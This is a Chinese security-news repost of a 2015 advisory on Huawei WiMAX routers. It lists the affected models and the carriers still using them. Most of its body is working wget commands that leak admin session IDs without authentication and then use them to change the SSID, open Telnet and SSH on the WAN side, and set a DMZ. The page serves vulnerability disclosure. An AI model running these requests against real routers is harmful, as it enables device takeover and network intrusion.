<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("华为,Wimax,路由器,漏洞") PageTitle=stripHTML("华为Wimax路由器被爆存在多个漏洞") ArticleIntro=stripHTML("华为BM626e是一款设计很不严谨的Wimax路由器/Ap设备,其可为互联网提供一个Wimax网络。") Articlecontent=stripHTML("                漏洞概述  以下测试是在最新版本的固件(V100R001CIVC24B010)下进行  注意:该固件在华为其他Wimax设备也有…") ModuleName = stripHTML("exploits") InfoID = stripHTML("219356") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> 华为Wimax路由器被爆存在多个漏洞 - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> 最新漏洞 >> 其它漏洞 >> 正文

[图文]华为Wimax路由器被爆存在多个漏洞

2015/12/4 作者:鸢尾 来源: 网络收集
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

             

  漏洞概述

  以下测试是在最新版本的固件(V100R001CIVC24B010)下进行

  注意:该固件在华为其他Wimax设备也有使用到,据华为官方确认以下设备是存在漏洞的:

EchoLife BM626e WiMAX CPE
EchoLife BM626 WiMAX CPE
EchoLife BM635 WiMAX CPE
EchoLife BM632 WiMAX CPE
EchoLife BM631a WiMAX CPE
EchoLife BM632w WiMAX CPE
EchoLife BM652 WiMAX CPE

  目前该路由器仍然在一些国家和地区进行销售和使用,至少目前我们获知以下国家和地区还在使用该产品:

MTN CI (科特迪瓦)
Iran Cell (伊朗)
Irak Telecom (伊拉克)
Libyamax (利比亚)
Globe Telecom (菲律宾)
Zain Bahrain (巴林岛)
FreshTel (乌克兰)

  细节-未经身份验证泄漏敏感信息

  默认情况下,http://192.168.1.1/check.html网页包含了重要信息(wimax配置,网络配置,WiFi和sip配置等),然而这些信息不用进行身份验证便可以轻松获取!

  虽说使用Javascript重定向可骚扰攻击者(/login.html),但是通过使用wget可轻松获取信息啊:

root@kali:~# wget http://192.168.1.1/check.html; less check.html

  细节-Admin会话cookies劫持

  如果一个管理员当前正在管理设备(或者正在使用设备,而没有采用正确的方式断开),攻击者可盗取位于LAN(或者是WAN:如果在WAN接口中开放了HTTP)中的当前/使用的会话

  管理员会话ID("SID")可在多个页面下不经过身份验证重新找回:

http://192.168.1.1/wimax/security.html

http://192.168.1.1/static/deviceinfo.html

...

  security.html网页中包含了一个有效的会话ID,而且不需要进行身份验证。

sid="SID24188"

  在JavaScript中写有一个“保护”,会将攻击者重定向到登录页面。但是这个Javascript中包含了管理员会话(sid="SIDXXXXX"),所以攻击者可使用wget命令轻松获取内容:

root@kali:~# wget http://192.168.1.1/wimax/security.html ; less security.html
root@kali:~# wget http://192.168.1.1/static/deviceinfo.html ; less deviceinfo.html

  请注意:通过访问网页,攻击者是可以通过管理面板断开管理员连接的。

  细节-使用盗取的管理员会话ID可获取敏感信息及进行CSRF攻击

  通过使用之前盗取的SID,不需要任何凭证便能够执行管理员才有操作权限的任务:

编辑WLAN配置
编辑WAN配置
编辑LAN配置
在LAN和WAN接口中打开HTTP/HTTPS/TELNET/SSH
改变DMZ配置
编辑端口映射
编辑通讯端口触发程序
编辑SIP配置
上传自定义固件
...

  获取个人信息(网络信息):

root@kali:~# wget -qO- 'http://192.168.1.1/static/rethdhcp.jsx?WWW_SID=SID24188&t=0'
Saving to: `STDOUT'
stats={};do{stats.dhcplist="44:8A:5B:AA:AA:AA,192.168.1.3,71:52:02@00:E0:4C:AA:AA:AA,192.168.1.2,71:52:02";
stats.reth="
   eth0      Link encap:Ethernet  HWaddr 34:6B:D3:AA:AA:AA
       UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1
       RX packets:27 errors:0 dropped:0 overruns:0 frame:0
       TX packets:109 errors:0 dropped:0 overruns:0 carrier:0
       collisions:0 txqueuelen:1000
       RX bytes:2887 (2.8 KiB)  TX bytes:46809 (45.7 KiB)
       Interrupt:9 Base address:0x4000
   eth1      Link encap:Ethernet  HWaddr 34:6B:D3:AA:AA:AA
       UP BROADCAST PROMISC MULTICAST  MTU:1500  Metric:
       RX packets:0 errors:0 dropped:0 overruns:0 frame:0
       TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
       collisions:0 txqueuelen:1000
       RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
       Interrupt:9 Base address:0x4000
    eth2      Link encap:Ethernet  HWaddr 34:6B:D3:AA:AA:AA
       UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1
       RX packets:2530 errors:0 dropped:0 overruns:0 frame:0
       TX packets:2619 errors:0 dropped:0 overruns:0 carrier:0
       collisions:0 txqueuelen:1000
       RX bytes:351557 (343.3 KiB)  TX bytes:536669 (524.0 KiB)
       Interrupt:9 Base address:0x4000
    eth3      Link encap:Ethernet  HWaddr 34:6B:D3:AA:AA:AA
       UP BROADCAST PROMISC MULTICAST  MTU:1500  Metric:1
       RX packets:0 errors:0 dropped:0 overruns:0 frame:0
       TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
       collisions:0 txqueuelen:1000
       RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
       Interrupt:9 Base address:0x4000
";stats.wlaninfo="
wl0       Link encap:Ethernet  HWaddr 34:6B:D3:AA:AA:AA
       UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
       RX packets:5257 errors:0 dropped:0 overruns:0 frame:0
       TX packets:846 errors:0 dropped:0 overruns:0 carrier:0
       collisions:0 txqueuelen:1000
       RX bytes:1117126 (1.0 MiB)  TX bytes:279600 (273.0 KiB)
 wl1       Link encap:Ethernet  HWaddr 34:6B:D3:AA:AA:AA
       UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
       RX packets:0 errors:0 dropped:0 overruns:0 frame:0
       [...]
root@kali:~#

  获取个人信息:

  另一个JSX网页:http://192.168.1.1/advanced/wanconnect.jsx?www_sid=sid24188&&t=0

root@kali:~# wget -qO- 'http://192.168.1.1/advanced/WANconnect.jsx?WWW_SID=SID24188&&t=0'
stats={};do{stats.PPPoEStatus='Disconnected'; stats.GREStatus='Disconnected';stats.wpsmode="7";stats.position="Idle,Idle,"}while(0);

  从这个JSX网页中我们可以获取很多信息,这个JSX网页留作读者作业。

  在Wimax路由器中会话ID也可以用来改变参数

  编辑WLAN的配置:

  这个请求会将第一个SSID改名为powned(你需要编辑/wimax/security.html网页中提供的WWW_SID):

root@kali:~# wget --no-cookies --header "Cookie: LoginTimes=0:LoginOverTime=0; FirstMenu=User_1; SecondMenu=User_1_1; ThirdMenu=User_1_1_1" --post-data='WWW_SID=SID24188&REDIRECT=wlan.html&SERVICE=wifi&SLEEP=2&WLAN_WifiEnable=1&Wlan_chkbox=0&WLAN_WirelessMode=9&WLAN_Channel=0&WLAN_SSID1=powned&WLAN_HideSSID=0%3B0%3B&WLAN_AuthMode=WPAPSKWPA2PSK%3BWPAPSKWPA2PSK%3B&WLAN_EncrypType=TKIPAES%3BTKIPAES%3B&WLAN_COUNTRY_REGION=1&WLAN_Country_Code=1d&WLAN_TXPOWER_NOR=13&WLAN_MAXNUM_STA=16%3B16%3B&WLAN_FragThreshold=2346&WLAN_BeaconPeriod=100&WLAN_RTSThreshold=2347&WLAN_BssidNum=2&WLAN_WscConfMode=7&WLAN_WscAction=3&WLAN_CountryCode=CI&WLAN_WscPinCode=&WLAN_TXRATE=0&WLAN_HTBW=0&WLAN_NTH_SSID=1&WLAN_PinFlag=2' http://192.168.1.1/basic/mtk.cgi

  打开管理接口:

  该请求会打开LAN以及WAN接口中的HTTP/HTTPS/TELNET/SSH(你需要编辑/wimax/security.html网页中提供的WWW_SID):

root@kali:~# wget --no-cookies --header "Cookie: LoginTimes=0:LoginOverTime=0; FirstMenu=User_2; SecondMenu=User_2_1; ThirdMenu=User_2_1_0" --post-data='WWW_SID=SID24188&REDIRECT=acl.html&SERVICE=mini_httpd%2Cmini_httpsd%2Ctelnetd%2Cdropbear&SLEEP=2&HTTPD_ENABLE=1&HTTPSD_ENABLE=1&MGMT_WEB_WAN=1&MGMT_TELNET_LAN=1&MGMT_TELNET_WAN=1&MGMT_SSH_LAN=1&MGMT_SSH_WAN=1&HTTPD_PORT=80&httpslan=getValue%28&HTTPSD_PORT=443&TELNETD_PORT=23&SSHD_PORT=22' http://192.168.1.1/basic/mtk.cgi

  (管理员可在http://192.168.1.1/advanced/acl.html页面检查改变)

  改变DMZ操作:

  重定向WAN端口到位于LAN中的目标客户端(你需要编辑/wimax/security.html网页中提供的WWW_SID):

root@kali:~# wget --no-cookies --header "Cookie: LoginTimes=0:LoginOverTime=0; FirstMenu=User_2; SecondMenu=User_2_1; ThirdMenu=User_2_1_0" --post-data='WWW_SID=SID24188&REDIRECT=dmz.html&SERVICE=netfilter_dmz&NETFILTER_DMZ_HOST=192.168.1.2&NETFILTER_DMZ_ENABLE=1&DMZInterface=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1&DMZHostIPAddress=192.168.1.2&DMZEnable=on&TriggerPort=&TriggerPortEnd=' http://192.168.1.1/advanced/user.cgi

  (管理员可在http://192.168.1.1/advanced/dmz.html页面检查改变)

  其他一些可能的操作同样留作读者作业吧:

Editing PortMapping
Editing Porttrigger
Editing Sip configuration
Uploading a custom firmware
...

  该漏洞是由Pierre Kim(@PierreKimSec)挖掘

  参考文献

  https://pierrekim.github.io/advisories/2015-huawei-0×01.txt

  https://pierrekim.github.io/blog/2015-12-01-Huawei-Wimax-routers-vulnerable-to-multiple-threats.htm